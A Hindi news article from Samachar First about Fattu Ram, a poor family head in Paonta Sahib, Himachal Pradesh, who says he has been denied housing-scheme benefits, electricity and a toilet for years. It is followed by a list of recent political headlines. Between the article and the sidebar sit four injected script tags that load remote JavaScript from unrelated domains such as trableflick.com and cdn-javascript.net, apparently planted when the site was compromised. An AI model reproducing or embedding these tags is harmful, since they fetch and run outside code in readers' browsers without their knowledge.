Categories: हिमाचल

पांवटा साहिब के फत्तू राम को नहीं मिला आवास योजना का लाभ, अपने हक़ के लिए प्रदेश सरकार से मांगी सहायता

<p>देश के प्रधानमंत्री ने साल 2022 में सभी को आवास देने का लक्ष्य रखा गया है। देश के प्रधानमंत्री का सपना है की हर एक भारतीय का अपना घर हो। सरकार इस दिशा में भले ही प्रयास कर रही है। लेकिन अधिकारीयों के पक्षपात की वजह से गरीब लोगों को सरकार की योजना का लाभ नहीं मिल पा रहा है। एक ऐसा ही मामला पांवटा साहिब के गिरिपार क्षेत्र के राजपुर पंचायत के अन्तर्गत रामनगर में रहने वाले फत्तू के परिवार का है। यह परिवार गरीबी रेखा से नीचे रह रहा है। जिसके लिए इसे बीपीएल का राशनकार्ड भी दिया गया है। लेकिन इस दस्तावेज का फायदा सिर्फ सरकारी राशन की दूकान पर ही मिल रहा है।</p>

<p>जहां से सिर्फ सस्ता राशन इस परिवार को उपलब्ध हो पाता है। लेकिन आज तक इसे आवास, विद्युत और शौचालय जैसी मूलभूत सुविधाओं से वंचित रखा गया है। यहां गरीब के साथ सीधा-सीधा अन्याय हो रहा है। फत्तू राम की कई पीढ़ियां गरीबी के दौर से गुजर चुकी है। इस गरीब को 21वीं सदी में भी सरकार द्वारा उन्हें आवास देने के लिए कोई भी व्यवस्था नहीं है। फत्तू का परिवार इतना गरीब है, कि इनके घर में अभी तक रोशनी तक नहीं पहुंचा है और ना ही गरीब के घर पर शौचायल बना है। हर पांच साल कई राजनैतिक पार्टियां आती है और लुभावने प्रलोभन देकर चली जाती है। लेकिन उसके बाद इस गरीब को भुला दिया जाता है। अब मीडिया के माध्यम से फत्तू राम ने अपने टूटे फूटे शब्दों के माध्यम से मदद की गुहार लगाई है।</p>

<p>बताते चले कि फत्तू ने पिछले करीब 15 साल से पंचायत और अन्य विभाग के चक्कर काटे है। उन्हें सम्पूर्ण दस्तावेज भी दिए है। परन्तु उन्हें आवास दिलाने में सिर्फ आश्वासन मात्र ही दिया गया है। गौरतलब है कि राजनिति में उंची पकड रखने वाले इस सारे खेल में अपने चहितों की गोटिया फिट कर जाते है और फत्तू जैसा गरीब आवास, विद्युत और शौचालय की सुविधाओं से वचिंत रह जाता है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1578911180087″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

OPS को लेकर कर्मचारियों को गुमराह कर रही भाजपा: जगत सिंह नेगी

OPS को लेकर कर्मचारियों को गुमराह कर रही भाजपा, हिमाचल में भी OPS बंद होने…

8 hours ago

कांग्रेसियों के वादे भाजपा ने किए पूरे: मीनाक्षी लेखी

कांग्रेसियों के वादे भाजपा ने किया पूरे, 2014 से पहले संसद-विधानसभा में पारित होते थे…

9 hours ago

हिमाचल सरकार के मंत्री अनिरुद्ध सिंह का दावा, देश में 250 के पार भी नहीं जा रही भाजपा

हिमाचल सरकार के मंत्री अनिरुद्ध सिंह का दावा, देश में 250 के पार भी नहीं…

10 hours ago

निर्दलीय चुनाव लड़े मनीष तोमर कांग्रेस में शामिल

निर्दलीय चुनाव लड़े मनीष तोमर कांग्रेस में शामिल पूर्व विधायक रतन सिंह के पोते हरप्रीत…

13 hours ago

धर्मशाला में मैच से 6 घंटे पहले भारी मालवाहक वाहनों के लिए बंद होगी एंट्री

धर्मशाला में मैच से 6 घंटे पहले भारी मालवाहक वाहनों के लिए बंद होगी एंट्री…

13 hours ago

भाजपा सरकार ने खजाना लुटाकर प्रदेश को कंगाल किया: मुख्यमंत्री

भाजपा सरकार ने खजाना लुटाकर प्रदेश को कंगाल किया : मुख्यमंत्री जयराम ठाकुर सब जानते…

13 hours ago